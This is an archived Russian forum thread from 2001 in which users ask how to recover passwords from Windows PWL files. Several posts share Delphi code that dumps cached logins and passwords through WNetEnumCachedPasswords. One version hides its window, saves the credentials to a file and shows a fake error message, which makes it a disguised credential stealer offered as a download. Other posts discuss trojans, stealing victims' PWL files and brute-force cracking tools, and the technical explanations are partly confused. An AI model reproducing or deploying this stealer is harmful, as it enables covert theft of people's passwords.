Форум: "Система";
Текущий архив: 2002.02.25;
Скачать: [xml.tar.bz2];
Внизрасшифровка PWL Найти похожие ветки
← →
Di_wind (2001-11-03 14:23) [0]Может кто все-таки скажет я уже неоднократно поднимал сей вопрос только все ссылалсиь на то что гд-то это уже есть но на самом деле нигде ничего про рашифровку нету так может кто скажет все-таки как?
← →
Knight (2001-11-03 14:28) [1]Там алгоритм офигенный - раз , во-вторых поисковики юзаешь? Статья где-то была. Не на сурсес.ру часом? Но я не помню...
И вообще, юзай ПВЛтул
У меня вопрос в тему - пароль текущего юзверя не зашифрован. Где он?(находится)
← →
Dima-k17 (2001-11-03 15:06) [2]К слову, когда-то у меня была такая проблема, когда очень хотелось написать 1-ый троян:) pwl он воровал, но расшифровать я не мог, а всё оказалось просто. Алгоритм не дам, но сам ищи на www.passwords.ru или на подобных серверах. Спроси на xakep.ru или ещё лучше на hackzone.ru
← →
Di_wind (2001-11-03 15:43) [3]я где-то дыбал какую-то фигню которая мне его в хеш виде выдавала ...толко на хрен он мне в хэш виде нужен...к слову: троянов не пишу...
← →
Ajax (2001-11-03 16:25) [4]2Dima-k17: жадный, да???!!!
← →
Remy (2001-11-04 09:44) [5]Надеюсь разберешься ...
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; external mpr name "WNetEnumCachedPasswords";
type
PWinPassword = ^TWinPassword;
TWinPassword = record
EntrySize: Word;
ResourceSize: Word;
PasswordSize: Word;
EntryIndex: Byte;
EntryType: Byte;
PasswordC: Char;
end;
var
WinPassword: TWinPassword;
function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
Password: String;
PC: Array[0..$FF] of Char;
begin
inc(Count);
Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
PC[WinPassword.ResourceSize] := #0;
CharToOem(PC, PC);
Password := StrPas(PC);
Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
PC[WinPassword.PasswordSize] := #0;
CharToOem(PC, PC);
Password := Password + ": " + StrPas(PC);
Form1.Memo1.Lines.Add(Password);//на форму бросаешь memo и видишь login и possword
Result := True;
end;
← →
Ajax (2001-11-04 14:03) [6]По-моему, приведенный код позволяет узнать кешированные пароли, а вот к расшифровке PWL никакого отношения не имеет. Сорри если не прав.
← →
Di_wind (2001-11-04 15:34) [7]>>Remy вопервых что такое count? во вторых то что ты дал неработает выводит ":" может я неправильно набпал а может из-за count"a (я его отключил);
>>Ajax я наверно неправильно поставил вопрос мне нужно пароль той машины на которой работаешь т.е видимио пароль храняться где-тов памяти...
← →
кто-то из толпы (2001-11-04 16:50) [8]Есть вариант не воровать PWL, а с помощью функкций (не скажу каких)
сразу получать на компе его номера телефонов login и Pass.
У меня работает, но исходник не дам.
← →
Di_wind (2001-11-04 18:13) [9]>>кто-то из толпы а хрен-ли выпендриваешся тогда?
← →
33 (2001-11-05 01:10) [10]To:Di_wind ©
Думать надо головой, а не языком.
Этот вопрос с разными вариантами уже обсуждался.
И исходники выкладивались. Надо только поискать,
подумать и кое-что добавить.
С мозгами нынче напряженка, а с языком - без проблем.
← →
Dima-k17 (2001-11-05 10:53) [11]>Ajax
Нет,осторожный.
← →
Ajax (2001-11-05 15:56) [12]Работает на 100%. Код не мой.
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; stdcall;
implementation
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; external mpr name "WNetEnumCachedPasswords";
type
PWinPassword = ^TWinPassword;
TWinPassword = record
EntrySize: Word;
ResourceSize: Word;
PasswordSize: Word;
EntryIndex: Byte;
EntryType: Byte;
PasswordC: Char;
end;
function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
Password: String;
PC: Array[0..$FF] of Char;
begin
inc(Count);
Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
PC[WinPassword.ResourceSize] := #0;
CharToOem(PC, PC);
Password := StrPas(PC);
Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
PC[WinPassword.PasswordSize] := #0;
CharToOem(PC, PC);
Password := Password + ": " + StrPas(PC);
Writeln(F,password);
Result := True;
end;
procedure TForm1.FormShow(Sender: TObject);
begin
form1.Height := 1;
form1.Width := 1;
AssignFile(F,"D:\result.txt");
Rewrite(F);
if WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) <> 0 then
begin
Application.MessageBox("WARNING! System error! Can""t read data files.", "Error", mb_Ok or mb_IconWarning);
Application.Terminate;
end
else
if Count = 0 then
ListBox.Items.Add("There is no files in system directory");
CloseFile(F);
application.Terminate ;
end;
← →
Di_wind (2001-11-05 18:07) [13]у меня выдает WARNING! System error! Can""t read data files наверно я урод....:)
← →
Ajax (2001-11-06 17:47) [14]Давай я тебе по почте вышлю весь проект и скомпилированный EXE. Надо?
← →
andersen (2001-11-06 22:39) [15]>Ajax
И мне плиз.
← →
Di_wind (2001-11-06 23:28) [16]надо
← →
panov (2001-11-07 01:59) [17]Вы только посмотрите - как надо файл .pwl расшифровать...
← →
TheNobody (2001-11-07 05:58) [18]Да никак его не расшифровывают!!!!!
Он ХЕШИРОВАН и всё тут.
Его только подбирают по словарю или брутфорсом.
Для этого тулзов, ну море понаписано.
Одну из них зовут PWLHack.
Могу скинуть нуждающимся.
Правда исходников у меня нет.
И незнаю я как он хешируется.
← →
panov (2001-11-07 14:10) [19]Блин, сколько "хакеров" развелось...
← →
Ajax (2001-11-07 14:38) [20]2Di_wind&andersen: Тогда я по почте не буду слать. Если надо можете слить с http://atalexis.narod.ru/download/Sources/pswtakes.rar(Моя страничка. Я только щас разбираюсь что да как, так что над дизайном не смеятся, а лучше помочь.)
← →
Di_wind (2001-11-07 15:34) [21]>>Ajax нерабоает :)
← →
Ajax (2001-11-07 17:26) [22]Странно конечно, но через эксплорер действительно не работает. А вот если скопировать этот адрес и вставить в какой-нибудь менеджер закачки (ну там Reget какой-нибуть) то все ништяк.
← →
Fellomena (2001-11-09 14:42) [23]Мда... ребята, вы даёте8) как парвильно выразился panov: хацкеров у нас полно 8)
Может кто ещё пришлёт обратный алгоритм DES-а или MD5 ?
Буду очень благодарна - денег много дам - а вам тут же Нобиля 8)))
Для тех кто в танке: pwl-ки расшифровывались с помощью обратного алгоритма, только в
старых Виндах (ещё в 95 и то не всех). А сейчас используют методы необратимого кодирования.
Поищите в www.yandex.ru что нибудь по ключу des, solt, crypt, passwd и не
позорьте нацию !
← →
Anatoly Podgoretsky (2001-11-09 22:01) [24]TheNobody © (07.11.01 05:58)
Дал реальный метод взлома, но это не расшифровка, так как сие не возможно, так как пароли не хранятся, есть хеш он сигнатура
← →
Tosov (2001-11-10 00:42) [25]Вопрос : как PWL могут шифроваться необратимым алгоритмом, если в них находятся логины и пароли не только на вход в сеть (комп). Там и на dialup должны быть. И как их в таком случае винда узнает??
← →
Anatoly Podgoretsky (2001-11-10 11:46) [26]А ты уверен, что они их там хранит?
У меня например в реестре, а вот там они не кешированные, а шифрованные
← →
pakko (2001-11-10 12:37) [27]Ip надо узнавать у жертвы на чей комп влез злой троян. А отсылать хозяину трояна и всем его друзьям!
← →
Tosov (2001-11-11 18:18) [28]2Anatoly Podgoretsky
>А ты уверен, что они их там хранит?
Вопрос : что винда хранит в PWL ???
← →
Anatoly Podgoretsky (2001-11-11 19:25) [29]Пароль на вход в систему
← →
Tosov (2001-11-12 16:16) [30]А зачем он нужен супер ][акерам-троянописателям?? Они чего, хотят в систему войти лично?
← →
Anatoly Podgoretsky (2001-11-12 22:05) [31]Для входа достаточно нажать Escape
← →
Fellomena (2001-11-14 16:36) [32]...э, тяжёлый случай, ну да ладно, будем лечить:
Расскажу я вам сказочку про DES:
Шифpуются не паpоли. Шифpуется Salt. Salt - это две
первые буквы (5f) в 5fg63fhD3d5g - это то, что все считают шифрованным
паролем
Вот алгоритм работы DES:
a) Система вырабатывает Salt - случайные две буквы.
б) Запрашивает у пользователя пароль.
в) Шифрует Salt используя DES, пароль используется как ключ.
г) Записывает Salt, плюс pезультат шифpования в passwd.
В качестве метода шифрования кроме DES в некоторых системах используют MD5. (FreeBSD к примеру)
В PGP юзают RAS. На hackzone RC5 8))) - шутка ;)
Идентификация пользователя проходит в два этапа- сначала на запрос "Login:" пользователь вводит свой login_name, затем программа login
шифрует Salt используя в качестве ключа введённое после запроса "Password:" слово, и результат сравнивает с записанной в passwd
строкой.
Программы ломания паролей используют словари ( wordlists ).
Каждое слово из словаря используется в качестве ключа для шифровки
Salt и результат сравнивается с содержимым passwd (pwl в нашем "тяжёлом" случае 8).
Для справки - в pwl винды хранит пароли на вход в систему, на диалап, пароли на доступ к сетевым папкам,
пароли, которые кэшируются системой при обращении в чаты на всякие mail.ru (если вы их действительно кэшируете).
(что, неужели никто не юзал John The Ripper или PWLTool ? )
АПОФИОЗ: pwl-ки не расшифровывабтся; пароль узнать можно ТОЛЬКО перебором, методом грубой силы (по словарю или же просто перебором символов)!!!
На некоторые pwl-ки (программа pwltool) уходит секунда, некоторые никогда не разгадываются.
Из pwl файла можно подчерпнуть ОЧЕНЬ много всего интерестного (если юзверь не параноик, как я 8).
Кстати мой рекорд - 154 дня John крутил один passwd-шник и нашёл-таки пароль (камень - Duron650);
← →
Tosov (2001-11-14 20:48) [33]2 Fellomena
Ты это к чему рассказала?
>Для справки - в pwl винды хранит пароли на вход в систему, на диалап, пароли на доступ к сетевым папкам,
пароли, ...
>АПОФИОЗ: pwl-ки не расшифровывабтся; пароль узнать можно ТОЛЬКО перебором
Вариант - хочешь позванить провайдеру. Пароль на диалап находится в pwl. Т.к. pwl не расшифровывается, а пароль ты каждый раз не набираешь, то значит както винда его из pwl получает.
>Кстати мой рекорд - 154 дня John крутил один passwd-шник и нашёл-таки пароль;
Значит винда пароли из pwl перебором достает? У меня на диалап пароль -14 символов-> дней через 10e+nnn винда пароль подберет и начнет звонить.
Может ты обьяснишь это?
← →
Владислав (2001-11-15 08:25) [34]> Tosov © (14.11.01 20:48)
А что тут объяснять?
Судя по предыдущему рассказу, винда берет введенный пароль в качестве ключа. Шифрует известные ей символы. Если результат (шифрованный) совпадает с тем, который сохранен в pwl, то милости просим.
← →
Fellomena (2001-11-15 12:43) [35]2 Владислав:
рада, что мои слова были поняты, а то у меня создалось такое впечатление, что некоторые товарищи - ну сОвСеМ не втыкают в тему.
2 Tosov:
извини, но ты что совсем ни хрена не понял ???
И не тебе, парниша, глумится надо мной, я этим занималась давно и серьёзно.
И если ты такой недалёкий, то возьми свою pwl-ку, и скорми pwltool-у, хотя не
уверена, что ты с программой справишься.
А твой сраный 14-ти символьный пароль на dial-up не на что не годен, если он в pwl-ки лежит.
Если не веришь, что я его ломану - мыль свою pwl-ку и посмотрим...
← →
CommandArm (2001-11-15 13:56) [36]Не спорьте с Fellomena - это признаный авторитет
Мне помогла инфой
← →
Tosov (2001-11-15 20:57) [37]2 Владислав
>винда берет введенный пароль в качестве ключа
какой пароль? откуда берет?(я говорю не про пароль на вход в систему!!!!!)
2 Fellomena
>И не тебе, парниша, глумится надо мной, я этим занималась давно и серьёзно
Я всего лишь спросил как винда ПОЛУЧАЕТ ПАРОЛЬ НА ДИАЛАП, если pwl зашифрована ТАК, ЧТО ПАРОЛЬ ПОЛУЧАЕМ ТОЛЬКО ПЕРЕБОРОМ. Ответа не последовало.
>я этим занималась давно и серьёзно
А я этим вообще не занимался поэтому и спрашиваю.
pwl-ки к сожалению у меня нет (на NT она к сожалению не предусмотрена)
>14-ти символьный пароль на dial-up не на что не годен, если он в pwl-ки лежит
Опять же ПОЧЕМУ?? Он же зашифрован с поможью современнейшего алгоритма DES?
>что я его ломану - мыль свою pwl-ку и посмотрим...
Давай так : на днях схожу с чел-ку, у которого WinME и сделаю себе pwl и пошлю ее тебе - пароль до 14 символов.
Каким образом будешь искать пароль - методом прямого перебора или есть другие способы?
← →
panov (2001-11-16 07:54) [38]>Fellomena (15.11.01 12:43)
Ты правда такая/ой умная/ый, или прикидываешься?
А может быть, ты вообще умнее всех?
← →
Fellomena (2001-11-16 16:46) [39]ПРОШУ ПРОЩЕНИЯ, ЕСЛИ КОГО-ТО ОСКАРБИЛА !!!
у меня такие глюки бывают 8(
2 Tosov: пойми главное: все пароли, находящиеся в pwl кодируются одним паролем, тем, что ты вводишь когда логинишься в систему
Теперь надеюсь понятна тщетность ввода 14-ти значного пароля на dial-up если на вход в систему пароль 123 ?!?
Ещё одно: если вы уже залогинились, то система "знает" вашь пароль и вы можете СРАЗУ без всякого перебора посмотреть
содержание вашей pwl-ки ! Отсюда вытекает ответ - откуда берётся пароль на dial-up...
И вообще, почитайте на http://www.passwords.ru/ статьи о Windows-овских системах защиты - там всё отлично написанно и
есть соответствующие проги.
DES - далеко не современнейший 8))) вот RC5 уже другое дело :)
Про pwl-ку: иди к другу, сделай pwl-ку, но пароль на вход сделай до 5 символов (нету у меня времени на 7-8 символьные сейчас 8)
ну и закешируй туда штучек 5-7 паролей от мыла, или чатов или ещё чего - вот и посмотрим 8)
2 panov: да какой там умная - смеёшься ?- конечно прикидываюсь !!! Ещё в школе учусь кстати...
ПРосто некоторые элементарные и общеизвестные факты не знать как-то стыдно imho...
Да и вообще, до того как начать программить по-нормальному я кое чем другим занималась, с
INet-security связанным (вообще-то из-за этого и начала программить :)
← →
Tosov (2001-11-16 17:06) [40]Fellomena (14.11.01 16:36)
>АПОФИОЗ: pwl-ки не расшифровывабтся
Fellomena (16.11.01 16:46)
>система "знает" вашь пароль и вы можете СРАЗУ без всякого перебора посмотреть содержание вашей pwl-ки !
А я то думал, что если что-то не расшифровывается, то из того, что было после шифрования нельзя получить то, что было до шифрования (иначе как перебором). Я вероятно ошибался?
Пожалуйста как спец по Inet-security обьясни формулировку НЕ РАСШИФРОВЫВАЕТСЯ.
Пароли в юнихе шифруются необратимо, но в них не хранится пароли на dialup и другая лажа.Оказывается и в винде тоже?
>Про pwl-ку: иди к другу, сделай pwl-ку, но пароль на вход сделай до 5 символов
Не смешно!! Пароль из 5 символов я и сам расшифрую (если не ошибаюсь для этого потребуются секунды). А 10 устроит?
Страницы: 1 2 вся ветка
Форум: "Система";
Текущий архив: 2002.02.25;
Скачать: [xml.tar.bz2];
Память: 0.55 MB
Время: 0.004 c